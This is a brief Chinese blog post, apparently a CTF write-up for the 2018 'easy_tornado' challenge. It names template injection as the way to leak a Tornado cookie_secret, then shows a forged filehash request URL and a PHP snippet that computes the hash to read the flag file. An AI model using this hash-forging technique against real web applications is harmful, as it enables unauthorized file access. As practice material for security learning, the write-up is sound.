[护网杯 2018]easy_tornado
打开网站
文件内容
/flag.txt
/wecome.txt
/hints/txt
url发现文件包含
不加filehash参数会爆错
filehash的值应该是hints.txt文件中的计算式得到的
但是cookie_secret在哪里找?
welcome.txt文件中有render???
存在模板注入
payload
?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))
?filename=/fllllllllllllag&filehash=b3a0bf12f5f3b27133df5ec19c09351e
<?php
$str1 = md5("/fllllllllllllag");
$str = md5("120cd284-eb54-422b-829e-2969cebb5e18".$str1);
echo $str;
?>
本文来自博客园,作者:oldliutou,转载请注明原文链接:https://www.cnblogs.com/oldliutou/p/15728603.html